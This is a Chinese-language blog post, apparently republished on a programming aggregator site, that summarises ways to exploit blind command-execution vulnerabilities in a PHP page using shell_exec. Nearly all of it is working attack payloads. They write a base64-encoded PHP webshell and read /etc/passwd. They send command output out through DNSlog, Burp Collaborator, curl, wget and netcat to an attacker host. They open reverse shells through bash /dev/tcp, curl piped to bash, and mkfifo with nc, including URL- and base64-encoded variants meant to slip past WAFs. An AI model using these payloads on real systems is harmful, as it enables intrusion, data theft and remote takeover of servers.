我的编程空间,编程开发者的网络收藏夹
学习永远不晚

超全的命令(代码)执行漏洞无回显的姿势总结(附带详细代码和测试分析过程)

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

超全的命令(代码)执行漏洞无回显的姿势总结(附带详细代码和测试分析过程)

目录

漏洞代码

突破方式

重定向

dnslog外部通信

burpsuite burpcollaborator外部通信

日志监听

netcat监听

反弹shell的各种姿势


漏洞代码

这里使用了无回显的shell执行函数shell_exec,给html目录的权限是777

突破方式

重定向

将需要获取的内容重定向到新文件里面

eval.php?a=cat%20/etc/passwd%20>info.txt

然后访问info.txt

或者重定向一个新的webshell到该目录下

echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php//

访问新的webshell即可

dnslog外部通信

eval.php?a=ping `whami`.tfkfae.dnslog.cn

burpsuite burpcollaborator外部通信

原理同dnslog,貌似比dnslog更加灵敏

?a=ping%20`whoami`.9lvy3js5qy3eg6b4cmtyzypl2c82wr.burpcollaborator.net

日志监听

用 curl 协议访问远程服务器 ip 的 80 端口,再到 kali 的终端查看记录即可

用一台kali监听日志

python3 -m http.server 80

执行命令

/eval.php?a=curl%20192.168.10.133/?`whoami`/eval.php?a=wget%20192.168.10.133/?`whoami`

查看日志

/eval.php?a=curl%20192.168.10.133/?`cat%20/etc/passwd`

netcat监听

nc -lvp 8888nc -lp 8888>./content?a=nc%20192.168.10.133%208888%20<%20/etc/passwd

查看content.txt内容

反弹shell的各种姿势

  • bash反弹
nc -vlnp 8080bash -i >& /dev/tcp/192.168.10.128/8080 0>&1

这里在www网页里面反弹失败,我们在服务器终端可以反弹

  • 使用指定的bash shell反弹
/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.128/8080 0>&1'

 这里需要进行URL编码

%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%2f%38%30%38%30%20%30%3e%26%31%27

此时成功在web网页反弹shell

  • curl反弹shell

攻击者启动http服务,并在站点目录下存放一个文件,里面写着bash反弹shell命令

?a=curl%20http://192.168.10.128/bashshell|bash

成功反弹到shell

  • 临时文件反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 8080 >/tmp/f

URL编码

%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%20%38%30%38%30%20%3e%2f%74%6d%70%2f%66

这里同样只在终端反弹成功,在web端口反弹失败

  • base64编码
L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc=/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.128/8080 0>&1'
echo "L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc=" |base64 -d |bash

URL编码

%65%63%68%6f%20%22%4c%32%4a%70%62%69%39%69%59%58%4e%6f%49%43%31%6a%49%43%64%69%59%58%4e%6f%49%43%31%70%49%44%34%6d%49%43%39%6b%5a%58%59%76%64%47%4e%77%4c%7a%45%35%4d%69%34%78%4e%6a%67%75%4d%54%41%75%4d%54%49%34%4c%7a%67%77%4f%44%41%67%4d%44%34%6d%4d%53%63%3d%22%20%7c%62%61%73%65%36%34%20%2d%64%20%7c%62%61%73%68

这里也成功在web端口反弹到shell,可以绕过部分waf

来源地址:https://blog.csdn.net/qq_63701832/article/details/129343487

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

超全的命令(代码)执行漏洞无回显的姿势总结(附带详细代码和测试分析过程)

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录